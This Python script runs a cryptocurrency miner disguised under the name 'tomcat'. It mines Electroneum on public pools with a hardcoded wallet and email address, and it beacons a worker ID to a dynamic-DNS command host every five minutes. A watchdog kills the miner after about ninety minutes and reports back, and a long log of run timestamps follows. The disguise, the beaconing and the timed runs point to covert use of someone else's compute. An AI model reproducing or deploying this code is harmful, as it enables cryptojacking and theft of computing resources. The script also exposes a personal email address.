import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:12:06.321019
#2018-02-17 16:58:01.299124
#2018-02-17 18:46:06.401781
#2018-02-17 20:34:04.592852
#2018-02-17 22:20:08.137240
#2018-02-18 00:04:07.524281
#2018-02-18 01:55:05.850799
#2018-02-18 03:43:04.564621
#2018-02-18 05:31:07.438114
#2018-02-18 07:23:05.769421
#2018-02-18 09:11:05.321133
#2018-02-18 10:57:01.720295
#2018-02-18 12:44:04.707637
#2018-02-18 14:31:03.614260
#2018-02-18 16:21:06.510672
#2018-02-18 18:11:03.872085
#2018-02-18 19:57:05.234219
#2018-02-18 21:43:08.015106
#2018-02-18 23:32:05.865146
#2018-02-19 01:18:01.260103
#2018-02-19 03:06:06.466449
#2018-02-19 04:52:05.373288
#2018-02-19 06:36:07.594354
#2018-02-19 08:26:06.381393
#2018-02-19 10:15:07.842506
#2018-02-19 12:04:01.363530
#2018-02-19 13:51:08.337990
#2018-02-19 15:42:04.940959
#2018-02-19 17:31:07.691748
#2018-02-19 19:18:04.865126
#2018-02-19 21:07:06.255296
#2018-02-19 22:54:07.655486
#2018-02-20 00:38:01.413895
#2018-02-20 02:27:01.778658
#2018-02-20 04:19:05.444915
#2018-02-20 06:03:05.182124
#2018-02-20 07:48:05.259176
#2018-02-20 09:34:01.764733
#2018-02-20 11:17:06.983851
#2018-02-20 13:04:04.495360
#2018-02-20 14:48:08.138678
#2018-02-20 16:35:06.283112
#2018-02-20 18:21:07.800523
#2018-02-20 20:11:04.394769
#2018-02-20 21:58:02.048028
#2018-02-20 23:39:03.526920
#2018-02-21 01:23:07.652457
#2018-02-21 03:11:06.310444
#2018-02-21 04:59:04.975772
#2018-02-21 06:48:03.528819
#2018-02-21 08:35:07.676280
#2018-02-21 10:21:04.546241
#2018-02-21 12:08:08.205097
#2018-02-21 13:58:01.604925
#2018-02-21 15:43:05.418877
#2018-02-21 17:35:02.240530
#2018-02-21 19:23:04.826049
#2018-02-21 21:12:06.497891
#2018-02-21 23:00:09.535824
#2018-02-22 00:48:07.886209
#2018-02-22 02:35:07.919219
#2018-02-22 04:21:04.223508
#2018-02-22 06:07:08.657850
#2018-02-22 07:52:05.017487
#2018-02-22 09:42:05.148508
#2018-02-22 11:28:05.065115
#2018-02-22 13:16:05.658323
#2018-02-22 15:06:05.721647
#2018-02-22 16:51:07.230327
#2018-02-22 18:39:06.720651
#2018-02-22 20:29:07.188464
#2018-02-22 22:15:09.213694
#2018-02-23 00:03:06.470861
#2018-02-23 01:50:08.326289
#2018-02-23 03:38:06.289969
#2018-02-23 05:23:01.550986
#2018-02-23 07:08:05.841636
#2018-02-23 08:58:02.071387
#2018-02-23 11:16:07.024968
#2018-02-23 13:09:09.070690
#2018-02-23 14:55:09.742418
#2018-02-23 16:43:08.712180
#2018-02-23 18:30:05.414520
#2018-02-23 20:14:03.855335
#2018-02-23 22:03:07.701465
#2018-02-23 23:51:06.548855
#2018-02-24 01:42:07.152730
#2018-02-24 03:33:07.886377
#2018-02-24 05:18:07.419496
#2018-02-24 07:06:07.327774
#2018-02-24 08:53:03.707717
#2018-02-24 10:53:03.744911
#2018-02-24 12:41:03.907908
#2018-02-24 14:29:05.894840
#2018-02-24 16:17:04.896928
#2018-02-24 18:11:07.278768
#2018-02-24 19:57:05.528251
#2018-02-24 21:40:07.963115
#2018-02-25 00:35:06.071130
#2018-02-25 04:24:07.611290
#2018-02-25 07:57:05.019211